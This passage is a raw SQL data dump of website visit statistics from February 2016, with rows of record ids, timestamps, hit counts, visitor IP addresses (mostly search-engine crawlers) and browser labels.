8.158',''),(5280,1455897188,1,1,0,0,'207.46.13.10','other'),(5281,1455897658,1,1,0,0,'178.154.149.11','other'),(5283,1455897659,1,1,0,0,'141.8.184.18','other'),(5284,1455897687,1,1,0,0,'66.249.81.205','other'),(5285,1455897784,1,1,0,0,'91.196.178.70','chrome'),(5286,1455897827,1,1,0,0,'217.69.133.227','other'),(5287,1455898693,1,1,0,0,'62.210.215.100','chrome'),(5288,1455899166,2,2,0,0,'141.8.184.18','other'),(5289,1455899550,1,1,0,0,'5.255.253.53','other'),(5290,1455899634,1,1,0,0,'157.55.39.44','other'),(5291,1455899806,1,1,0,0,'94.178.7.35','firefox'),(5292,1455900195,1,1,0,0,'217.69.133.235','other'),(5293,1455900911,1,0,1,0,'66.249.78.151',''),(5294,1455901104,1,1,0,0,'217.69.133.230','other'),(5295,1455901375,1,1,0,0,'66.249.81.205','other'),(5296,1455901388,1,0,1,0,'68.180.229.232',''),(5297,1455901778,2,0,2,0,'66.249.78.158',''),(5298,1455901982,2,0,2,0,'66.249.78.151',''),(5299,1455903031,1,1,0,0,'91.231.149.189','chrome'),(5300,1455903151,1,0,1,0,'66.249.78.144',''),(5301,1455903152,1,1,0,0,'141.8.184.18','other'),(5302,1455903531,1,1,0,0,'94.178.7.35','firefox'),(5303,1455903564,1,1,0,0,'87.206.26.193','firefox'),(5304,1455903946,1,1,0,0,'141.8.183.14','other'),(5306,1455903995,1,1,0,0,'207.46.13.10','other'),(5307,1455904244,1,0,1,0,'68.180.229.232',''),(5308,1455904873,1,1,0,0,'217.69.133.14','other'),(5309,1455904983,1,1,0,0,'66.249.81.211','other'),(5310,1455905263,1,1,0,0,'217.69.133.221','other'),(5311,1455905412,1,0,1,0,'66.249.78.158',''),(5312,1455905580,6,6,0,0,'157.55.39.2','other'),(5313,1455905582,3,3,0,0,'157.55.39.118','other'),(5314,1455905588,8,8,0,0,'157.55.39.44','other'),(5315,1455905596,7,7,0,0,'207.46.13.10','other'),(5316,1455905605,1,0,1,0,'66.249.78.151',''),(5317,1455905650,1,1,0,0,'66.249.91.63','other'),(5318,1455905753,1,0,1,0,'68.180.229.232',''),(5319,1455905911,1,1,0,0,'8.29.198.25','other'),(5320,1455906438,1,1,0,0,'141.8.184.18','other'),(5321,1455906553,1,1,0,0,'51.255.65.39','other'),(5322,1455906774,1,1,0,0,'157.55.39.2','other'),(5323,1455907601,1,0,1,0,'68.180.229.232',''),(5324,1455908067,1,1,0,0,'51.255.65.36','other'),(5325,1455908362,2,2,0,0,'207.46.13.10','other'),(5326,1455908402,1,1,0,0,'94.178.7.35','firefox'),(5327,1455908583,1,0,1,0,'66.249.78.151',''),(5328,1455908649,1,1,0,0,'66.249.81.211','other'),(5329,1455908892,1,1,0,0,'178.154.149.11','other'),(5330,1455908895,2,2,0,0,'141.8.183.14','other'),(5331,1455908971,1,1,0,0,'157.55.39.2','other'),(5332,1455909534,1,1,0,0,'51.255.65.18','other'),(5333,1455909566,1,0,1,0,'66.249.78.151',''),(5334,1455909607,1,1,0,0,'207.46.13.10','other'),(5335,1455910314,1,0,1,0,'66.249.78.158',''),(5336,1455910643,1,1,0,0,'62.210.215.100','chrome'),(5337,1455911595,1,1,0,0,'157.55.39.2','other'),(5338,1455911872,1,1,0,0,'91.124.239.161','chrome'),(5339,1455912108,2,2,0,0,'157.55.39.44','other'),(5340,1455912185,1,1,0,0,'66.249.81.208','other'),(5341,1455914431,1,1,0,0,'91.196.178.10','firefox'),(5342,1455914512,1,1,0,0,'217.69.133.28','other'),(5343,1455914749,1,1,0,0,'157.55.39.44','other'),(5344,1455914830,1,1,0,0,'141.8.132.99','other'),(5345,1455915235,1,0,1,0,'66.249.78.151',''),(5346,1455915903,1,0,1,0,'66.249.69.3',''),(5347,1455915936,1,1,0,0,'141.0.15.207','other'),(5348,1455916220,1,1,0,0,'66.249.91.8','other'),(5349,1455916538,2,0,2,0,'66.249.78.158',''),(5350,1455916760,1,1,0,0,'8.29.198.25','other'),(5351,1455917146,31,31,0,0,'80.91.162.99','other'),(5352,1455917221,1,0,1,0,'66.249.78.30',''),(5353,1455917369,1,1,0,0,'141.8.184.18','other'),(5354,1455918929,1,1,0,0,'157.55.39.44','other'),(5355,1455919223,1,0,1,0,'66.249.78.151',''),(5356,1455919554,1,1,0,0,'66.249.81.205','other'),(5357,1455920124,1,1,0,0,'157.55.39.2','other'),(5358,1455920891,1,1,0,0,'207.46.13.10','other'),(5359,1455920985,1,1,0,0,'141.8.184.22','other'),(5360,1455921133,1,1,0,0,'157.55.39.2','other'),(5361,1455921731,1,1,0,0,'77.47.227.49','firefox'),(5362,1455922046,1,0,1,0,'66.249.78.158',''),(5363,1455922453,23,23,0,0,'51.254.131.244','other'),(5364,1455922760,1,0,1,0,'66.249.78.151',''),(5365,1455922777,1,0,1,0,'68.180.229.232',''),(5366,1455922983,1,1,0,0,'66.249.81.211','other'),(5367,1455923267,1,1,0,0,'62.210.215.100','chrome'),(5368,1455923532,1,1,0,0,'51.255.65.33','other'),(5369,1455924737,1,1,0,0,'207.46.13.10','other'),(5370,1455926063,1,1,0,0,'66.249.78.144','chrome'),(5371,1455926274,1,1,0,0,'217.69.133.193','other'),(5372,1455926686,1,1,0,0,'157.55.39.118','other'),(5373,1455926740,1,1,0,0,'66.249.91.4','other'),(5374,1455926930,1,1,0,0,'157.55.39.44','other'),(5375,1455927143,1,1,0,0,'89.38.150.47','chrome'),(5376,1455927482,1,1,0,0,'141.8.184.18','other'),(5377,1455927573,1,1,0,0,'8.29.198.25','other'),(5378,1455927813,1,0,1,0,'66.249.78.158',''),(5379,1455927920,1,0,1,0,'66.249.75.101',''),(5380,1455928583,1,1,0,0,'207.46.13.10','other'),(5381,1455929898,1,1,0,0,'141.8.184.18','other'),(5382,1455929899,1,1,0,0,'178.154.149.11','other'),(5383,1455930660,139,139,0,0,'82.193.127.15','other'),(5384,1455931239,1,1,0,0,'51.255.65.10','other'),(5385,1455931713,1,0,1,0,'66.249.78.144',''),(5386,1455931723,1,1,0,0,'217.69.133.249','other'),(5387,1455931801,1,1,0,0,'178.154.189.204','other'),(5388,1455932776,1,1,0,0,'207.46.13.10','other'),(5389,1455933876,1,1,0,0,'217.69.133.216','other'),(5390,1455934935,1,0,1,0,'66.249.78.151',''),(5391,1455935573,2,2,0,0,'62.210.215.100','chrome'),(5392,1455935874,1,1,0,0,'157.55.39.118','other'),(5393,1455935980,3,0,3,0,'68.180.229.232',''),(5394,1455936054,1,1,0,0,'180.76.15.15','other'),(5395,1455936084,1,1,0,0,'180.76.15.158','other'),(5396,1455936912,1,1,0,0,'180.76.15.135','other'),(5397,1455937164,1,0,1,0,'68.180.229.232',''),(5398,1455937207,1,1,0,0,'176.77.127.152','msie'),(5399,1455937211,1,1,0,0,'95.25.33.208','msie'),(5400,1455937212,1,1,0,0,'178.140.84.128','msie'),(5401,1455937217,1,1,0,0,'89.179.251.67','msie'),(5402,1455937218,1,1,0,0,'79.165.187.140','msie'),(5403,1455937273,1,0,1,0,'66.249.69.11',''),(5404,1455937310,1,1,0,0,'66.249.91.63','other'),(5405,1455938415,1,1,0,0,'8.29.198.26','other'),(5406,1455938855,1,1,0,0,'82.193.127.15','other'),(5407,1455940147,2,0,2,0,'66.249.78.158',''),(5408,1455941346,1,1,0,0,'217.69.133.252','other'),(5409,1455944007,1,0,1,0,'68.180.229.232',''),(5410,1455944195,1,1,0,0,'80.91.162.99','other'),(5411,1455944734,1,1,0,0,'66.249.81.208','other'),(5412,1455944796,1,1,0,0,'207.46.13.10','other'),(5413,1455945047,1,1,0,0,'141.0.14.207','other'),(5414,1455945395,1,1,0,0,'51.255.65.49','other'),(5415,1455945678,2,0,2,0,'68.180.229.232',''),(5416,1455945859,5,5,0,0,'82.193.127.15','other'),(5417,1455946349,2,2,0,0,'69.30.255.138','other'),(5418,1455947241,1,1,0,0,'180.153.236.12','msie'),(5419,1455947417,1,1,0,0,'62.210.215.100','chrome'),(5420,1455948197,1,1,0,0,'66.249.81.208','other'),(5421,1455948299,1,1,0,0,'51.255.65.6','other'),(5422,1455948480,1,1,0,0,'66.249.92.99','other'),(5423,1455948753,1,0,1,0,'66.249.66.158',''),(5424,1455949232,2,2,0,0,'130.193.51.50','other'),(5425,1455949234,2,2,0,0,'5.255.253.10','other'),(5426,1455949237,1,1,0,0,'141.8.184.31','other'),(5427,1455949240,3,3,0,0,'5.255.253.103','other'),(5428,1455949244,2,2,0,0,'93.158.152.65','other'),(5429,1455949248,1,1,0,0,'130.193.50.31','other'),(5430,1455949301,1,1,0,0,'8.29.198.25','other'),(5431,1455949431,3,3,0,0,'141.8.142.60','other'),(5432,1455949450,1,0,1,0,'66.249.78.158',''),(5433,1455949474,2,2,0,0,'130.193.51.22','other'),(5434,1455949480,3,3,0,0,'178.154.149.9','other'),(5435,1455949484,3,3,0,0,'141.8.142.8','other'),(5436,1455949487,2,2,0,0,'130.193.50.22','other'),(5437,1455949491,1,1,0,0,'141.8.132.48','other'),(5438,1455949522,3,3,0,0,'141.8.142.55','other'),(5439,1455949525,1,1,0,0,'130.193.51.55','other'),(5440,1455949537,2,2,0,0,'141.8.132.66','other'),(5441,1455949541,1,1,0,0,'5.255.253.89','other'),(5442,1455949546,1,1,0,0,'141.8.142.10','other'),(5443,1455949555,3,3,0,0,'5.255.253.62','other'),(5444,1455949568,1,1,0,0,'141.8.132.109','other'),(5445,1455949586,1,1,0,0,'130.193.51.109','other'),(5446,1455949590,1,1,0,0,'141.8.132.97','other'),(5447,1455949617,3,3,0,0,'178.154.189.12','other'),(5448,1455949620,1,1,0,0,'130.193.37.21','other'),(5449,1455949625,3,3,0,0,'141.8.184.22','other'),(5450,1455949638,1,1,0,0,'130.193.51.45','other'),(5451,1455949642,1,1,0,0,'141.8.142.41','other'),(5452,1455949667,1,1,0,0,'141.8.132.2','other'),(5453,1455949694,1,1,0,0,'141.8.132.44','other'),(5454,1455949936,1,1,0,0,'180.76.15.144','other'),(5455,1455950335,1,1,0,0,'5.255.253.110','other'),(5456,1455950352,1,1,0,0,'5.255.253.103','other'),(5457,1455950361,2,2,0,0,'141.8.142.82','other'),(5458,1455950365,1,1,0,0,'130.193.51.85','other'),(5459,1455950383,1,1,0,0,'141.8.132.74','other'),(5460,1455950401,1,1,0,0,'130.193.50.22','other'),(5461,1455950412,1,1,0,0,'141.8.132.48','other'),(5462,1455950424,1,1,0,0,'141.8.132.79','other'),(5463,1455950432,2,2,0,0,'141.8.142.8','other'),(5464,1455950472,5,5,0,0,'173.234.159.250','other'),(5465,1455950502,1,1,0,0,'82.193.127.15','other'),(5466,1455950551,1,1,0,0,'207.46.13.10','other'),(5467,1455951044,1,1,0,0,'130.193.51.55','other'),(5468,1455951281,1,1,0,0,'217.69.133.21','other'),(5469,1455951372,1,0,1,0,'66.249.78.158',''),(5470,1455951476,1,1,0,0,'91.196.178.39','chrome'),(5471,1455951853,1,1,0,0,'66.249.81.208','other'),(5472,1455952450,1,1,0,0,'141.8.132.2','other'),(5473,1455952610,1,1,0,0,'157.55.39.118','other'),(5474,1455952632,1,0,1,0,'66.249.78.144',''),(5475,1455953111,1,1,0,0,'141.8.132.99','other'),(5476,1455953267,42,42,0,0,'82.193.127.15','other'),(5477,1455953571,1,0,1,0,'66.249.78.158',''),(5478,1455953633,1,1,0,0,'141.8.142.41','other'),(5479,1455954087,1,0,1,0,'68.180.229.232',''),(5480,1455954201,1,1,0,0,'141.8.183.14','other'),(5481,1455954204,1,1,0,0,'141.8.132.76','other'),(5482,1455954702,1,1,0,0,'141.8.184.18','other'),(5483,1455954800,1,0,1,0,'66.249.78.151',''),(5484,1455954881,2,0,2,0,'66.249.78.144',''),(5485,1455955095,1,0,1,0,'66.249.78.158',''),(5486,1455955500,1,0,1,0,'66.249.78.30',''),(5487,1455955533,1,1,0,0,'5.255.253.30','other'),(5488,1455955623,1,1,0,0,'178.154.149.11','other'),(5489,1455955667,1,1,0,0,'66.249.93.86','firefox'),(5490,1455956248,1,1,0,0,'5.255.253.55','other'),(5491,1455956252,1,1,0,0,'5.255.253.110','other'),(5492,1455956256,2,2,0,0,'93.158.152.26','other'),(5493,1455956260,1,1,0,0,'5.255.253.10','other'),(5494,1455956268,2,2,0,0,'141.8.142.88','other'),(5495,1455956280,3,3,0,0,'5.255.253.100','other'),(5496,1455956285,2,2,0,0,'141.8.132.79','other'),(5497,1455956289,2,2,0,0,'141.8.132.99','other'),(5498,1455956293,3,3,0,0,'141.8.142.41','other'),(5499,1455956305,2,2,0,0,'141.8.132.76','other'),(5500,1455956313,2,2,0,0,'141.8.132.97','other'),(5501,1455956321,1,1,0,0,'130.193.51.43','other'),(5502,1455956325,1,1,0,0,'130.193.51.102','other'),(5503,1455956329,1,1,0,0,'141.8.183.14','other'),(5504,1455956334,1,1,0,0,'5.255.253.9','other'),(5505,1455956338,1,1,0,0,'130.193.51.85','other'),(5506,1455956342,1,1,0,0,'5.255.253.94','other'),(5507,1455956346,1,1,0,0,'141.8.142.10','other'),(5508,1455956358,1,1,0,0,'141.8.132.2','other'),(5509,1455956496,2,0,2,0,'68.180.229.232',''),(5510,1455956518,1,1,0,0,'66.102.9.104','firefox'),(5511,1455956896,1,1,0,0,'141.8.184.18','other'),(5512,1455956899,1,1,0,0,'130.193.51.45','other'),(5513,1455956911,1,1,0,0,'93.158.152.9','other'),(5514,1455956963,1,1,0,0,'157.55.39.118','other'),(5515,1455957243,1,1,0,0,'51.255.65.46','other'),(5516,1455957303,1,0,1,0,'66.249.78.144',''),(5517,1455957341,1,0,1,0,'66.249.78.151',''),(5518,1455957904,1,1,0,0,'157.55.39.44','other'),(5519,1455958265,1,0,1,0,'66.249.78.30',''),(5520,1455958401,1,1,0,0,'91.196.178.99','chrome'),(5521,1455958421,1,0,1,0,'66.249.78.158',''),(5522,1455958907,1,1,0,0,'86.57.167.45','chrome'),(5523,1455958991,1,1,0,0,'66.249.81.205','other'),(5524,1455959302,1,1,0,0,'66.249.92.95','other'),(5525,1455959422,1,1,0,0,'178.93.148.79','other'),(5526,1455959954,2,2,0,0,'207.46.13.10','other'),(5527,1455960143,1,1,0,0,'8.29.198.25','other'),(5528,1455960304,1,1,0,0,'77.47.227.49','firefox'),(5529,1455960578,1,1,0,0,'51.255.65.60','other'),(5530,1455960588,1,1,0,0,'62.210.215.100','chrome'),(5531,1455960590,2,0,2,0,'66.249.78.151',''),(5532,1455960644,1,0,1,0,'66.249.78.144',''),(5533,1455961679,1,1,0,0,'141.0.15.12','other'),(5534,1455961849,1,1,0,0,'94.178.7.35','firefox'),(5535,1455962106,1,1,0,0,'62.210.215.100','chrome'),(5536,1455962183,1,1,0,0,'91.196.178.132','firefox'),(5537,1455962641,1,0,1,0,'68.180.229.232',''),(5538,1455962651,1,1,0,0,'66.249.81.208','other'),(5539,1455963205,1,1,0,0,'92.112.68.160','chrome'),(5540,1455963208,1,0,1,0,'66.249.78.151',''),(5541,1455963225,1,1,0,0,'157.55.39.44','other'),(5542,1455963299,6,6,0,0,'176.58.113.34','firefox'),(5543,1455963303,4,4,0,0,'176.58.113.34','other'),(5544,1455963469,1,1,0,0,'130.193.37.27','other'),(5545,1455963963,1,1,0,0,'141.8.132.76','other'),(5546,1455964152,1,1,0,0,'89.38.150.47','chrome'),(5547,1455964183,1,1,0,0,'92.112.68.160','chrome'),(5548,1455964199,1,1,0,0,'178.136.102.187','msie'),(5549,1455964610,1,0,1,0,'68.180.229.232',''),(5550,1455964801,1,0,1,0,'66.249.78.158',''),(5551,1455965045,2,2,0,0,'93.158.152.9','other'),(5552,1455965049,1,1,0,0,'141.8.183.14','other'),(5553,1455965054,1,1,0,0,'5.255.253.9','other'),(5554,1455965057,1,1,0,0,'141.8.142.88','other'),(5555,1455965061,1,1,0,0,'141.8.142.8','other'),(5556,1455965065,1,1,0,0,'141.8.184.18','other'),(5557,1455965069,1,1,0,0,'178.154.149.11','other'),(5558,1455965073,1,1,0,0,'5.255.253.53','other'),(5559,1455965077,1,1,0,0,'141.8.132.99','other'),(5560,1455965083,1,1,0,0,'5.255.253.100','other'),(5561,1455965086,1,1,0,0,'130.193.51.45','other'),(5562,1455965095,1,1,0,0,'141.8.132.2','other'),(5563,1455965098,1,1,0,0,'5.255.253.10','other'),(5564,1455965500,1,1,0,0,'40.76.57.128','other'),(5565,1455965607,1,1,0,0,'78.111.190.62','chrome'),(5566,1455965687,1,1,0,0,'40.77.167.55','other'),(5567,1455965962,1,0,1,0,'66.249.78.158',''),(5568,1455966209,1,1,0,0,'66.249.81.208','other'),(5569,1455966321,1,0,1,0,'66.249.78.144',''),(5570,1455966520,1,1,0,0,'78.111.190.62','chrome'),(5571,1455966558,1,0,1,0,'66.249.78.37',''),(5572,1455966894,8,8,0,0,'80.91.162.99','other'),(5573,1455967463,2,0,2,0,'66.249.78.158',''),(5574,1455967747,1,0,1,0,'66.249.78.144',''),(5575,1455968402,1,1,0,0,'180.76.15.137','other'),(5576,1455968810,1,1,0,0,'82.193.127.15','other'),(5577,1455968937,1,1,0,0,'217.69.133.252','other'),(5578,1455969836,1,1,0,0,'66.249.81.208','other'),(5579,1455970173,1,1,0,0,'66.249.92.103','other'),(5580,1455970310,1,1,0,0,'51.255.65.89','other'),(5581,1455970325,3,0,3,0,'66.249.78.151',''),(5582,1455970338,1,0,1,0,'66.249.78.144',''),(5583,1455970674,1,1,0,0,'157.55.39.118','other'),(5584,1455970968,1,1,0,0,'8.29.198.26','other'),(5585,1455971138,2,0,2,0,'68.180.229.232',''),(5586,1455971651,2,0,2,0,'66.249.78.151',''),(5587,1455971866,1,1,0,0,'40.77.167.55','other'),(5588,1455972191,1,0,1,0,'68.180.229.232',''),(5589,1455972287,1,0,1,0,'66.249.78.144',''),(5590,1455973207,2,0,2,0,'66.249.78.144',''),(5591,1455973454,1,1,0,0,'66.249.81.208','other'),(5592,1455973735,2,2,0,0,'157.55.39.44','other'),(5593,1455973765,1,1,0,0,'180.76.15.135','other'),(5594,1455975527,2,2,0,0,'172.245.128.159','other'),(5595,1455975537,1,1,0,0,'172.245.128.159','firefox'),(5596,1455975871,1,0,1,0,'66.249.78.158',''),(5597,1455975880,4,0,4,0,'66.249.78.151',''),(5598,1455976021,1,1,0,0,'180.76.15.138','other'),(5599,1455976112,1,0,1,0,'66.249.78.30',''),(5600,1455976127,1,1,0,0,'91.196.178.39','firefox'),(5601,1455976715,2,0,2,0,'66.249.78.144',''),(5602,1455976985,1,1,0,0,'66.249.81.205','other'),(5603,1455977303,1,1,0,0,'40.78.146.128','other'),(5604,1455977374,1,1,0,0,'157.55.39.44','other'),(5605,1455978162,1,1,0,0,'78.111.190.134','chrome'),(5606,1455978369,2,0,2,0,'68.180.229.232',''),(5607,1455978435,1,1,0,0,'62.210.215.100','chrome'),(5608,1455979000,1,0,1,0,'66.249.78.144',''),(5609,1455979320,2,0,2,0,'66.249.78.158',''),(5610,1455979411,1,0,1,0,'66.249.78.44',''),(5611,1455980371,2,0,2,0,'66.249.78.151',''),(5612,1455980496,1,0,1,0,'66.249.78.158',''),(5613,1455980586,1,1,0,0,'66.249.81.211','other'),(5614,1455981231,1,1,0,0,'66.249.92.99','other'),(5615,1455981765,1,0,1,0,'66.249.78.144',''),(5616,1455981805,1,1,0,0,'8.29.198.25','other'),(5617,1455981995,2,0,2,0,'68.180.229.232',''),(5618,1455982261,1,0,1,0,'66.249.78.151',''),(5619,1455982467,2,0,2,0,'66.249.78.158',''),(5620,1455982768,1,1,0,0,'207.46.13.10','other'),(5621,1455983103,1,0,1,0,'66.249.78.144',''),(5622,1455983390,1,1,0,0,'193.33.216.23','chrome'),(5623,1455983584,2,0,2,0,'66.249.78.151',''),(5624,1455984006,1,1,0,0,'94.179.26.81','firefox'),(5625,1455984240,1,1,0,0,'66.249.81.211','other'),(5626,1455984346,1,0,1,0,'68.180.229.232',''),(5627,1455984784,1,1,0,0,'157.55.39.44','other'),(5628,1455984795,1,1,0,0,'46.211.3.103','other'),(5629,1455984862,1,1,0,0,'94.179.83.1','firefox'),(5630,1455985177,1,1,0,0,'51.255.65.7','other'),(5631,1455985921,1,1,0,0,'51.255.65.66','other'),(5632,1455986407,1,0,1,0,'68.180.229.232',''),(5633,1455986427,1,0,1,0,'66.249.78.151',''),(5634,1455987260,1,1,0,0,'40.77.167.55','other'),(5635,1455987512,1,1,0,0,'62.210.215.100','chrome'),(5636,1455987582,1,1,0,0,'157.55.39.118','other'),(5637,1455987718,2,0,2,0,'66.249.78.151',''),(5638,1455987877,1,1,0,0,'66.249.81.211','other'),(5639,1455988480,1,1,0,0,'141.8.142.8','other'),(5640,1455988483,1,1,0,0,'93.158.152.26','other'),(5641,1455988671,2,0,2,0,'66.249.78.151',''),(5642,1455988967,1,1,0,0,'51.255.65.39','other'),(5643,1455989369,1,1,0,0,'180.76.15.21','other'),(5644,1455989786,1,0,1,0,'66.249.78.158',''),(5645,1455989939,1,0,1,0,'66.249.78.151',''),(5646,1455990132,2,0,2,0,'66.249.78.144',''),(5647,1455990857,206,206,0,0,'82.193.127.15','other'),(5648,1455991100,1,1,0,0,'217.69.136.209','other'),(5649,1455991135,1,1,0,0,'157.55.39.118','other'),(5650,1455991447,1,1,0,0,'66.249.81.208','other'),(5651,1455991508,3,0,3,0,'66.249.78.151',''),(5652,1455991655,1,1,0,0,'91.196.178.69','firefox'),(5653,1455991747,1,1,0,0,'46.200.201.168','firefox'),(5654,1455992075,2,0,2,0,'68.180.229.232',''),(5655,1455992412,1,1,0,0,'66.249.92.103','other'),(5656,1455992497,1,0,1,0,'66.249.78.158',''),(5657,1455992511,2,2,0,0,'51.255.155.83','chrome'),(5658,1455992584,3,0,3,0,'66.249.78.151',''),(5659,1455992690,1,1,0,0,'8.29.198.25','other'),(5660,1455992807,1,1,0,0,'157.55.39.44','other'),(5661,1455992971,81,81,0,0,'82.193.127.15','other'),(5662,1455993199,3,0,3,0,'68.180.229.232',''),(5663,1455993249,1,1,0,0,'62.210.215.100','chrome'),(5664,1455993543,2,0,2,0,'66.249.78.144',''),(5665,1455993661,1,0,1,0,'66.249.78.151',''),(5666,1455993761,1,1,0,0,'66.102.7.198','firefox'),(5667,1455993872,52,52,0,0,'82.193.127.15','other'),(5668,1455994212,1,1,0,0,'51.255.65.4','other'),(5669,1455994455,1,1,0,0,'94.179.2.66','chrome'),(5670,1455995020,1,1,0,0,'66.249.81.205','other'),(5671,1455995207,1,0,1,0,'66.249.78.158',''),(5672,1455995275,1,1,0,0,'141.8.132.76','other'),(5673,1455995279,1,1,0,0,'141.8.183.14','other'),(5674,1455995384,1,1,0,0,'157.55.39.118','other'),(5675,1455995406,1,0,1,0,'66.249.66.158',''),(5676,1455995846,1,1,0,0,'95.133.238.4','chrome'),(5677,1455996061,1,0,1,0,'66.249.78.144',''),(5678,1455996179,1,0,1,0,'66.249.78.151',''),(5679,1455997029,1,1,0,0,'51.255.65.92','other'),(5680,1455997072,1,0,1,0,'68.180.229.232',''),(5681,1455997779,1,0,1,0,'66.249.78.158',''),(5682,1455998026,11,11,0,0,'82.193.127.15','other'),(5683,1455998410,1,1,0,0,'93.158.152.26','other'),(5684,1455998632,1,1,0,0,'66.249.81.208','other'),(5685,1455999098,2,0,2,0,'66.249.78.151',''),(5686,1455999159,1,1,0,0,'51.255.65.32','other'),(5687,1455999269,1,0,1,0,'66.249.78.144',''),(5688,1455999464,1,1,0,0,'141.8.132.48','other'),(5689,1455999466,1,1,0,0,'93.158.152.9','other'),(5690,1455999940,1,0,1,0,'66.249.78.158',''),(5691,1455999987,1,1,0,0,'51.255.65.7','other'),(5692,1456000150,1,1,0,0,'157.55.39.44','other'),(5693,1456000394,1,1,0,0,'141.8.132.99','other'),(5694,1456000396,1,1,0,0,'141.8.132.2','other'),(5695,1456000398,1,1,0,0,'141.8.132.74','other'),(5696,1456000835,1,0,1,0,'66.249.78.144',''),(5697,1456001670,1,1,0,0,'141.8.142.8','other'),(5698,1456002076,1,1,0,0,'157.55.39.44','other'),(5699,1456002253,1,0,1,0,'66.249.78.151',''),(5700,1456002286,1,1,0,0,'66.249.81.208','other'),(5701,1456002957,1,1,0,0,'5.255.253.103','other'),(5702,1456003071,2,0,2,0,'66.249.78.144',''),(5703,1456003330,1,1,0,0,'66.249.92.99','other'),(5704,1456003434,1,1,0,0,'207.46.13.10','other'),(5705,1456003509,1,1,0,0,'8.29.198.25','other'),(5706,1456004257,1,1,0,0,'130.193.51.81','other'),(5707,1456004773,1,1,0,0,'51.255.65.78','other'),(5708,1456004817,1,0,1,0,'66.249.78.144',''),(5709,1456005024,1,0,1,0,'66.249.78.151',''),(5710,1456005631,1,1,0,0,'51.255.65.92','other'),(5711,1456005657,1,0,1,0,'66.249.78.37',''),(5712,1456005822,1,1,0,0,'66.249.81.211','other'),(5713,1456005931,3,0,3,0,'66.249.78.151',''),(5714,1456006048,2,0,2,0,'66.249.78.144',''),(5715,1456006419,1,1,0,0,'180.76.15.156','other'),(5716,1456006826,1,1,0,0,'141.8.184.31','other'),(5717,1456006993,1,1,0,0,'176.77.15.37','msie'),(5718,1456006998,1,0,1,0,'68.180.229.232',''),(5719,1456007288,1,0,1,0,'66.249.78.158',''),(5720,1456007470,1,0,1,0,'66.249.78.144',''),(5721,1456007474,2,2,0,0,'62.149.141.137','msie'),(5722,1456007479,10,10,0,0,'62.149.141.137','opera'),(5723,1456008472,1,0,1,0,'66.249.78.30',''),(5724,1456008571,2,0,2,0,'66.249.78.144',''),(5725,1456008591,1,1,0,0,'62.210.215.100','chrome'),(5726,1456008612,1,0,1,0,'68.180.229.232',''),(5727,1456009486,1,1,0,0,'66.249.81.205','other'),(5728,1456009620,13,13,0,0,'82.193.127.15','other'),(5729,1456010188,1,0,1,0,'68.180.229.232',''),(5730,1456010708,1,1,0,0,'5.140.93.240','chrome'),(5731,1456010732,1,1,0,0,'157.55.39.44','other'),(5732,1456011245,1,1,0,0,'46.242.28.169','msie'),(5733,1456011720,1,0,1,0,'66.249.66.158',''),(5734,1456011780,1,1,0,0,'51.255.65.46','other'),(5735,1456012105,1,1,0,0,'64.246.165.210','firefox'),(5736,1456012227,1,1,0,0,'128.72.107.240','msie'),(5737,1456013022,1,1,0,0,'180.76.15.155','other'),(5738,1456013333,1,0,1,0,'66.249.78.144',''),(5739,1456013613,1,0,1,0,'66.249.78.151',''),(5740,1456014314,1,1,0,0,'8.29.198.25','other'),(5741,1456014395,1,0,1,0,'66.249.66.129',''),(5742,1456014407,1,1,0,0,'51.255.65.84','other'),(5743,1456014640,1,1,0,0,'66.249.92.99','other'),(5744,1456014663,1,0,1,0,'66.249.78.44',''),(5745,1456014735,1,1,0,0,'188.32.109.73','msie'),(5746,1456014849,1,1,0,0,'130.193.37.27','other'),(5747,1456014852,1,1,0,0,'141.8.183.14','other'),(5748,1456015055,2,0,2,0,'66.249.78.144',''),(5749,1456016038,1,1,0,0,'157.55.39.44','other'),(5750,1456016688,1,0,1,0,'66.249.78.144',''),(5751,1456016771,1,1,0,0,'40.77.167.55','other'),(5752,1456017153,1,1,0,0,'51.255.65.7','other'),(5753,1456017321,1,0,1,0,'66.249.66.158',''),(5754,1456017815,1,1,0,0,'157.55.39.44','other'),(5755,1456018157,1,0,1,0,'68.180.229.232',''),(5756,1456018415,1,0,1,0,'66.249.78.144',''),(5757,1456019781,1,1,0,0,'157.55.39.118','other'),(5758,1456020186,1,0,1,0,'66.249.78.151',''),(5759,1456020579,1,1,0,0,'157.55.39.44','other'),(5760,1456020645,1,1,0,0,'207.46.13.10','other'),(5761,1456022460,1,0,1,0,'68.180.229.232',''),(5762,1456022572,1,1,0,0,'157.55.39.44','other'),(5763,1456022937,1,1,0,0,'51.255.65.65','other'),(5764,1456023167,2,2,0,0,'141.8.184.18','other'),(5765,1456023733,1,0,1,0,'66.249.78.151',''),(5766,1456023747,1,1,0,0,'157.55.39.44','other'),(5767,1456024586,1,0,1,0,'68.180.229.232',''),(5768,1456024685,1,1,0,0,'178.154.149.11','other'),(5769,1456024688,3,3,0,0,'5.255.253.9','other'),(5770,1456024692,1,1,0,0,'5.255.253.110','other'),(5771,1456024991,2,2,0,0,'130.193.51.102','other'),(5772,1456025080,3,3,0,0,'141.8.184.18','other'),(5773,1456025084,2,2,0,0,'130.193.37.27','other'),(5774,1456025096,1,1,0,0,'141.8.142.88','other'),(5775,1456025132,1,1,0,0,'8.29.198.26','other'),(5776,1456025475,3,3,0,0,'93.158.152.9','other'),(5777,1456025480,1,1,0,0,'141.8.184.11','other'),(5778,1456025489,2,2,0,0,'5.255.253.30','other'),(5779,1456025493,1,1,0,0,'130.193.51.45','other'),(5780,1456025497,3,3,0,0,'141.8.132.97','other'),(5781,1456025502,1,1,0,0,'141.8.132.76','other'),(5782,1456025548,3,3,0,0,'5.255.253.100','other'),(5783,1456025552,1,1,0,0,'93.158.152.26','other'),(5784,1456025557,1,1,0,0,'141.8.184.22','other'),(5785,1456025565,2,2,0,0,'141.8.132.79','other'),(5786,1456025569,1,1,0,0,'141.8.142.8','other'),(5787,1456025578,1,1,0,0,'141.8.142.10','other'),(5788,1456025586,1,1,0,0,'5.255.253.79','other'),(5789,1456025590,1,1,0,0,'5.255.253.9','other'),(5790,1456025600,1,1,0,0,'130.193.51.81','other'),(5791,1456025604,1,1,0,0,'5.255.253.10','other'),(5792,1456025607,3,3,0,0,'5.255.253.53','other'),(5793,1456025610,1,1,0,0,'5.255.253.103','other'),(5794,1456025613,2,2,0,0,'141.8.132.99','other'),(5795,1456025647,2,2,0,0,'141.8.183.14','other'),(5796,1456025649,1,1,0,0,'178.154.149.11','other'),(5797,1456025781,1,0,1,0,'66.249.78.144',''),(5798,1456025820,1,1,0,0,'66.249.92.99','other'),(5799,1456026459,1,1,0,0,'62.210.